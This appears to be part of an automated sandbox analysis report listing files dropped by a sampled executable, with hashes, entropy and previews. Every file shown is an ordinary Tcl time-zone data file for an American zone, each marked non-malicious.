                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Fortaleza) {.. {-9223372036854775808 -9240 0 LMT}.. {-1767216360 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8372
                                                                                                                                                                                                                              Entropy (8bit):3.8225708746657316
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:w4lTPB10KvnpNWMPm4bPJWXtRbALtuFW4ng2CEBJuQaeEy9P19OBYEi/B51B7/BI:wKCC
                                                                                                                                                                                                                              MD5:1C8B0B85BB5578E84A4867546111F946
                                                                                                                                                                                                                              SHA1:E08A96F5B369FA53BC1F3F839EC14FF9D334F727
                                                                                                                                                                                                                              SHA-256:58C207CBD9DE7A7BB15E48A62CEA9F15DA184B945133DEE88EFF29FD8B66B29E
                                                                                                                                                                                                                              SHA-512:54CFBF208AB3E58AFB6BEC40265A452A3C4C684D7F278F51D6495FCA544652A1A5E05BC45F600911191B33C936E5D7D43A28FD2B0884AAB9F63B7AD5EFD574A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Glace_Bay) {.. {-9223372036854775808 -14388 0 LMT}.. {-2131646412 -14400 0 AST}.. {-1632074400 -10800 1 ADT}.. {-1615143600 -14400 0 AST}.. {-880221600 -10800 1 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-536443200 -14400 0 AST}.. {-526500000 -10800 1 ADT}.. {-513198000 -14400 0 AST}.. {-504907200 -14400 0 AST}.. {63086400 -14400 0 AST}.. {73461600 -10800 1 ADT}.. {89182800 -14400 0 AST}.. {104911200 -10800 1 ADT}.. {120632400 -14400 0 AST}.. {126244800 -14400 0 AST}.. {136360800 -10800 1 ADT}.. {152082000 -14400 0 AST}.. {167810400 -10800 1 ADT}.. {183531600 -14400 0 AST}.. {199260000 -10800 1 ADT}.. {215586000 -14400 0 AST}.. {230709600 -10800 1 ADT}.. {247035600 -14400 0 AST}.. {262764000 -10800 1 ADT}.. {278485200 -14400 0 AST}.. {294213600 -10800 1 ADT}.. {309934800 -14400 0 AST}.. {325663200 -10800 1 ADT}
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.973070790103308
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0wQbSeyXHAIg20wQboAFARL/2IAcGE5GZJ4IAcGEH:SlSWB9vsM3y7lbSeSHAIgplbLFAN/291
                                                                                                                                                                                                                              MD5:8263D2B39C2EC3B38A179F8BAD5972DD
                                                                                                                                                                                                                              SHA1:18D3462F6846768E16036E860DE90FB345C93047
                                                                                                                                                                                                                              SHA-256:5FB2CFBA25CE2F49D4C3911AFF8E7E1FF84EFC2D01F5783772E88246BFBC56AC
                                                                                                                                                                                                                              SHA-512:C175CAF972459759553001D48921268E9C6268CED56021BA6339F8CE3DD032DA6180E2B82974D3DCD0DC5F21566DFDBFBE1B6CF24E5E893F2335A449452DB27F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Nuuk)]} {.. LoadTimeZoneFile America/Nuuk..}..set TZData(:America/Godthab) $TZData(:America/Nuuk)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10353
                                                                                                                                                                                                                              Entropy (8bit):3.864463676759425
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:zfSacO8f7/ewzlrfFj18KvnpNWMPm4bPJvSuYUHgA0G19OBYEi/B51B7/Bm6BTdW:zfSacOI7/V3SuYUHgAuCC
                                                                                                                                                                                                                              MD5:0D646C67105FD0525E7CCC79585CE9DF
                                                                                                                                                                                                                              SHA1:06D91FDD8FEEDC299E40079569372F97A9AC6F04
                                                                                                                                                                                                                              SHA-256:52D2478289682BF95BFB93D64D679E888C9D23C0F68DFFF7E6E34BFC44B3D892
                                                                                                                                                                                                                              SHA-512:FD672613C2B65E12425415630A2F489917EB80DDED41338C9AA7D5D3C6B54E52C516A32493593F518DACF22A91D7A9D2C96DB9C5F1BE2C3BB9842D274BDC04FF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Goose_Bay) {.. {-9223372036854775808 -14500 0 LMT}.. {-2713895900 -12652 0 NST}.. {-1640982548 -12652 0 NST}.. {-1632076148 -9052 1 NDT}.. {-1615145348 -12652 0 NST}.. {-1609446548 -12652 0 NST}.. {-1096921748 -12600 0 NST}.. {-1072989000 -12600 0 NST}.. {-1061670600 -9000 1 NDT}.. {-1048973400 -12600 0 NST}.. {-1030221000 -9000 1 NDT}.. {-1017523800 -12600 0 NST}.. {-998771400 -9000 1 NDT}.. {-986074200 -12600 0 NST}.. {-966717000 -9000 1 NDT}.. {-954624600 -12600 0 NST}.. {-935267400 -9000 1 NDT}.. {-922570200 -12600 0 NST}.. {-903817800 -9000 1 NDT}.. {-891120600 -12600 0 NST}.. {-872368200 -9000 0 NWT}.. {-769395600 -9000 1 NPT}.. {-765401400 -12600 0 NST}.. {-757369800 -12600 0 NST}.. {-746044200 -9000 1 NDT}.. {-733347000 -12600 0 NST}.. {-714594600 -9000 1 NDT}.. {-701897400 -12600 0 NST}.. {-683145000 -9000 1 NDT}.. {-67044
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7522
                                                                                                                                                                                                                              Entropy (8bit):3.84007813579738
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:pGStCt/cL1BRv0HY2iU7KKdFL6Aa2K4gSLf8e:pvItOx0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:A17723CE27EC99D1506C45AB1531085B
                                                                                                                                                                                                                              SHA1:A83ED7BD09514A829CC8F2EA47BA113F5DCA1090
                                                                                                                                                                                                                              SHA-256:560B39485CED4C2A0E85A66EB875331E5879104187D92CB7F05C2F635E34AC99
                                                                                                                                                                                                                              SHA-512:110D1253D6915DB046247E4FD3BA9B881146BC3896DE779215E0CC6D1DCC59958C355441955509F5D38E3A3BA166DFD0F2F277000E9E89D6551FBEA0C16974B9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Grand_Turk) {.. {-9223372036854775808 -17072 0 LMT}.. {-2524504528 -18430 0 KMT}.. {-1827687170 -18000 0 EST}.. {284014800 -18000 0 EST}.. {294217200 -14400 1 EDT}.. {309938400 -18000 0 EST}.. {325666800 -14400 1 EDT}.. {341388000 -18000 0 EST}.. {357116400 -14400 1 EDT}.. {372837600 -18000 0 EST}.. {388566000 -14400 1 EDT}.. {404892000 -18000 0 EST}.. {420015600 -14400 1 EDT}.. {436341600 -18000 0 EST}.. {452070000 -14400 1 EDT}.. {467791200 -18000 0 EST}.. {483519600 -14400 1 EDT}.. {499240800 -18000 0 EST}.. {514969200 -14400 1 EDT}.. {530690400 -18000 0 EST}.. {544604400 -14400 1 EDT}.. {562140000 -18000 0 EST}.. {576054000 -14400 1 EDT}.. {594194400 -18000 0 EST}.. {607503600 -14400 1 EDT}.. {625644000 -18000 0 EST}.. {638953200 -14400 1 EDT}.. {657093600 -18000 0 EST}.. {671007600 -14400 1 EDT}.. {688543200 -18000 0 EST}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):201
                                                                                                                                                                                                                              Entropy (8bit):4.892013473075135
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2905Qb90ppv:MByMYbpwt290Ob90b
                                                                                                                                                                                                                              MD5:4B9ABEA103F55509550F8B42D88E84B7
                                                                                                                                                                                                                              SHA1:E3AA1BCE5E260264E74F77E59C4071B7E496AB41
                                                                                                                                                                                                                              SHA-256:EBED070E8E67C5F12FF6E03FE508BE90789F17C793DFE61237B4045B8222580F
                                                                                                                                                                                                                              SHA-512:568E375464FF264C5048CB35995945BDE1D5BCC3A108B2A4D0F8389EBF18B4C58EBB1C2122F10BA777D512504A59C7EFDF6069EABD2A5DEA3189204B7F7A6EB4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Grenada) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.9138787435596765
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2905AJLr490ppv:MByMYbpwt290qJLr490b
                                                                                                                                                                                                                              MD5:92B091A06198E233B73DF12DFCD818D5
                                                                                                                                                                                                                              SHA1:C529488D09F86755E4F22CB4F0E3013C3A1B978D
                                                                                                                                                                                                                              SHA-256:6CB1930532831D12057FCB484C60DB64A60A4F6D8195DAFD464826923116A294
                                                                                                                                                                                                                              SHA-512:55EAE03CDECAC43BEDD3AA1A32C632A46808F29FF4D97A330F818544E4D10B9E9BA909D6627C38065EB7AC8E2C395FA37797F532CCFC8AB89D4698CCDE17F985
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Guadeloupe) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):399
                                                                                                                                                                                                                              Entropy (8bit):4.513185345162455
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862906GGmdHKznC972f/uF+mP/uF+K67Jqd3/uF+eBxE/uF+DAWNv:5neQCgfS+6S+K67Yd3S+e0S+1
                                                                                                                                                                                                                              MD5:569CDE7CE1AB84C0F16A25E85A418334
                                                                                                                                                                                                                              SHA1:EADE79AB6EDD98C7FE8B10B480C5C530CA014F5C
                                                                                                                                                                                                                              SHA-256:14F6A98D602F3648C816B110F3A0BA375E1FFE8FA06BEEAB419DC1ABFA6EDCAF
                                                                                                                                                                                                                              SHA-512:AE2ACBF09EED857906811BE2984D6BF92BF2955A9FE2F9F3FFEBB6790902F5C2C870F8561CA13AD9CB7826EECA434BED7CFE7D0D2739996BACEE506D0EB730DC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Guatemala) {.. {-9223372036854775808 -21724 0 LMT}.. {-1617040676 -21600 0 CST}.. {123055200 -18000 1 CDT}.. {130914000 -21600 0 CST}.. {422344800 -18000 1 CDT}.. {433054800 -21600 0 CST}.. {669708000 -18000 1 CDT}.. {684219600 -21600 0 CST}.. {1146376800 -18000 1 CDT}.. {1159678800 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):249
                                                                                                                                                                                                                              Entropy (8bit):4.745656594295655
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2905xDm2OHHjGeoHv5laITicKpKV0EX/uFhfF/KVg:MB86290jmdHHLCv5FT/gOR/uFpF/Og
                                                                                                                                                                                                                              MD5:DF661E312C6CE279CD6829120BE33CF2
                                                                                                                                                                                                                              SHA1:4ACDB31E27EF9175C5452BF95F94F9BC280A237F
                                                                                                                                                                                                                              SHA-256:6806AA5814BDC679C6EF653C518D2699114BE71D973F49C0864F622038DC2048
                                                                                                                                                                                                                              SHA-512:04E7FD01F4DAD981EE8A02487F4A889015C41D07D6DCF420183D387E2188FF3239E345B5D65FB195CA485F5C7B4AD8CFEF51FFFC11EE0C91F0C88FF7B7EF17C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Guayaquil) {.. {-9223372036854775808 -19160 0 LMT}.. {-2524502440 -18840 0 QMT}.. {-1230749160 -18000 0 -05}.. {722926800 -14400 1 -05}.. {728884800 -18000 0 -05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):248
                                                                                                                                                                                                                              Entropy (8bit):4.673559445766137
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2905R3SDm2OHRLx5oH8ZOXFxSyZ1yV/KMMdVVFAKFZ4KVR/ON:MB86290LGmdHBnC8ZODhyV/4d/OeZ4Ke
                                                                                                                                                                                                                              MD5:F06C226D8D53EF8859AD91D7EBA5959C
                                                                                                                                                                                                                              SHA1:E0B4E6F4ADCB10F1D79FFD928E8684FFE0C0DC5F
                                                                                                                                                                                                                              SHA-256:4078D2E361D04A66F22F652E3810CDF7F630CF89399B47E4EC7B1D32B400FD85
                                                                                                                                                                                                                              SHA-512:B4385650A0C69B7BD66415CC4BB9FCA854DBB1427E9F2D6C1D8CDB8CCEF9ECBD699C66A83A9AC289DABC5CDBB0A2B044E4097E9A2977AE1802B3BF6E2BB518CF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Guyana) {.. {-9223372036854775808 -13959 0 LMT}.. {-1843589241 -14400 0 -04}.. {-1730577600 -13500 0 -0345}.. {176096700 -10800 0 -03}.. {701841600 -14400 0 -04}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11124
                                                                                                                                                                                                                              Entropy (8bit):3.8106487461849885
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:YpQamC9XD81iWQSufutTLBCN8RWnWQ7Z/xVpmtBwXiCDLxcGMe++wzlrfFj10Kvn:2kXCvNc/1/CC
                                                                                                                                                                                                                              MD5:6FB9E47841FF397CE36A36C8280E2089
                                                                                                                                                                                                                              SHA1:DA210300DC3D94FC3D8BA0A4531341BCA5C5936C
                                                                                                                                                                                                                              SHA-256:01E11C7B07925D05E9E1876C310A2B87E0E80EF115D062225212E472B7A964F1
                                                                                                                                                                                                                              SHA-512:F61B5A8A7532BBD54A4976DF17A1C6CF51BCC6DC396482FBE169C3081AF27B6CA863F0CDE3E483C59F5A5BD3365592F6984A97173C736B41D3CEEDAD4263A4E5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Halifax) {.. {-9223372036854775808 -15264 0 LMT}.. {-2131645536 -14400 0 AST}.. {-1696276800 -10800 1 ADT}.. {-1680469200 -14400 0 AST}.. {-1640980800 -14400 0 AST}.. {-1632074400 -10800 1 ADT}.. {-1615143600 -14400 0 AST}.. {-1609444800 -14400 0 AST}.. {-1566763200 -10800 1 ADT}.. {-1557090000 -14400 0 AST}.. {-1535486400 -10800 1 ADT}.. {-1524949200 -14400 0 AST}.. {-1504468800 -10800 1 ADT}.. {-1493413200 -14400 0 AST}.. {-1472414400 -10800 1 ADT}.. {-1461963600 -14400 0 AST}.. {-1440964800 -10800 1 ADT}.. {-1429390800 -14400 0 AST}.. {-1409515200 -10800 1 ADT}.. {-1396731600 -14400 0 AST}.. {-1376856000 -10800 1 ADT}.. {-1366491600 -14400 0 AST}.. {-1346616000 -10800 1 ADT}.. {-1333832400 -14400 0 AST}.. {-1313956800 -10800 1 ADT}.. {-1303678800 -14400 0 AST}.. {-1282507200 -10800 1 ADT}.. {-1272661200 -14400 0 AST}.. {-1251057600
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8729
                                                                                                                                                                                                                              Entropy (8bit):3.8227313494100867
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:BEsWduCtQA/gF6Y3Umjm67yLb5RCzhV28I:BBWACb/gF6Y3UmjBy7
                                                                                                                                                                                                                              MD5:564980AECB32F5778422EA15E8956879
                                                                                                                                                                                                                              SHA1:545209C95043721C1839CCE5FEFD1A6F2DE3FE5F
                                                                                                                                                                                                                              SHA-256:96B62BFBF0C05CF970245597C691F89EBF631175796459642A85287F131D0215
                                                                                                                                                                                                                              SHA-512:25FE5DAA55E3466EAE1CDC73918F189403C3360D4E82D72D745FA04A374DE04F479AA9811D6154FC70CC8EA620F18035EA6A3074116806D4405936FA017CE8E6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Havana) {.. {-9223372036854775808 -19768 0 LMT}.. {-2524501832 -19776 0 HMT}.. {-1402813824 -18000 0 CST}.. {-1311534000 -14400 1 CDT}.. {-1300996800 -18000 0 CST}.. {-933534000 -14400 1 CDT}.. {-925675200 -18000 0 CST}.. {-902084400 -14400 1 CDT}.. {-893620800 -18000 0 CST}.. {-870030000 -14400 1 CDT}.. {-862171200 -18000 0 CST}.. {-775681200 -14400 1 CDT}.. {-767822400 -18000 0 CST}.. {-744231600 -14400 1 CDT}.. {-736372800 -18000 0 CST}.. {-144702000 -14400 1 CDT}.. {-134251200 -18000 0 CST}.. {-113425200 -14400 1 CDT}.. {-102542400 -18000 0 CST}.. {-86295600 -14400 1 CDT}.. {-72907200 -18000 0 CST}.. {-54154800 -14400 1 CDT}.. {-41457600 -18000 0 CST}.. {-21495600 -14400 1 CDT}.. {-5774400 -18000 0 CST}.. {9954000 -14400 1 CDT}.. {25675200 -18000 0 CST}.. {41403600 -14400 1 CDT}.. {57729600 -18000 0 CST}.. {73458000 -14400 1 CD
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):616
                                                                                                                                                                                                                              Entropy (8bit):4.351214377567366
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290e2mdH5NCtXwl3UXmMMmxL+voudQCvX70qKOV9kYNv:5Ie5k9WUQwuz/Vyu
                                                                                                                                                                                                                              MD5:E35A6C6E9DCF0CA34BFA2993CE445D6C
                                                                                                                                                                                                                              SHA1:4FF9C7EDBC73B1AE0815661571B7199379AF479C
                                                                                                                                                                                                                              SHA-256:C0A87DC3A474D25083F0CEA0C323D8E780D937453CAD23C98AF367D81AC2CA2D
                                                                                                                                                                                                                              SHA-512:56A728ABCD3EA91D2492E1331B3F76F31EF5675BCD95A692F9D94F91518B72569FD8DF1BB0515668E8A9BE0347018B391C65761D316903CA27C59883BBE0DE80
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Hermosillo) {.. {-9223372036854775808 -26632 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-873828000 -25200 0 MST}.. {-661539600 -28800 0 PST}.. {28800 -25200 0 MST}.. {828867600 -21600 1 MDT}.. {846403200 -25200 0 MST}.. {860317200 -21600 1 MDT}.. {877852800 -25200 0 MST}.. {891766800 -21600 1 MDT}.. {909302400 -25200 0 MST}.. {915174000 -25200 0 MST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7230
                                                                                                                                                                                                                              Entropy (8bit):3.882344472808608
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:nys0KHK1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:nyBKHkN0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:7824B3F2D20F16A9DCC8E0F7DC45C1B8
                                                                                                                                                                                                                              SHA1:77014A0502DA1342EFA41B64C5613839B627354B
                                                                                                                                                                                                                              SHA-256:4B114545167326F066AB3A798180896B43AC6FDC3B80D32BCC917B5A4A2359EB
                                                                                                                                                                                                                              SHA-512:03F6A18C03E79E9177D16CD7AB75AC117197638370FA675BC2854A5A563021F865F3F0672B237B83098787AB9D419AC33D67F28324B1E25AD8560B5838F70807
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Indianapolis) {.. {-9223372036854775808 -20678 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-1577901600 -21600 0 CST}.. {-900259200 -18000 1 CDT}.. {-891795600 -21600 0 CST}.. {-883591200 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747244800 -18000 1 CDT}.. {-733942800 -21600 0 CST}.. {-715795200 -18000 1 CDT}.. {-702493200 -21600 0 CST}.. {-684345600 -18000 1 CDT}.. {-671043600 -21600 0 CST}.. {-652896000 -18000 1 CDT}.. {-639594000 -21600 0 CST}.. {-620841600 -18000 1 CDT}.. {-608144400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8755
                                                                                                                                                                                                                              Entropy (8bit):3.8394539560522585
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:+q2KeNrdJ8SvAgahLi8hDlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:+FKUdJ8SvPaUqbA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:8AF080A022DA0737E94742C50EAAC62E
                                                                                                                                                                                                                              SHA1:704F0565B53AA8A20F70B79A7958D4D07085E07A
                                                                                                                                                                                                                              SHA-256:F1253F5F3F5AACD1A5E1F4636DD4E083F4B2A8BD995CF3E684CDD384641849F1
                                                                                                                                                                                                                              SHA-512:26AAF6D24B2E2B60451E19A514533DFAEC74F01F9B1AEB9F86690669C14130D77AE1CBFB9FC9091E1CD1FC1CBC2799BB05026DB68768C3CCB960355C18D111ED
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Knox) {.. {-9223372036854775808 -20790 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-725824800 -21600 0 CST}.. {-715795200 -18000 1 CDT}.. {-702493200 -21600 0 CST}.. {-684345600 -18000 1 CDT}.. {-671043600 -21600 0 CST}.. {-652896000 -18000 1 CDT}.. {-639594000 -21600 0 CST}.. {-620841600 -18000 1 CDT}.. {-608144400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-463593600 -18000 1 CDT}.. {-447267600 -21600 0 CST}.. {-431539200 -18000 1 CDT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7273
                                                                                                                                                                                                                              Entropy (8bit):3.8700915866109535
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:7qvrv7+X1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:7Kv7+bN0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:C1A10440E6CCE4C5052E2510182D9AA7
                                                                                                                                                                                                                              SHA1:56D4F3CCA1245D626BADA74CF3F6BAE8034BF58D
                                                                                                                                                                                                                              SHA-256:675162381639598E7100E90663D42780F8EE1CB62BD6DA5B948B494F98C02FE3
                                                                                                                                                                                                                              SHA-512:96B71472AD38ECFC589F935D9F5F1C8D42C8E942D8772FB6A77F9B9C0E2BD7A07FA61729E57EC02356121518E33797A784679F8DED2FCA3FC79F5C114783DD57
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
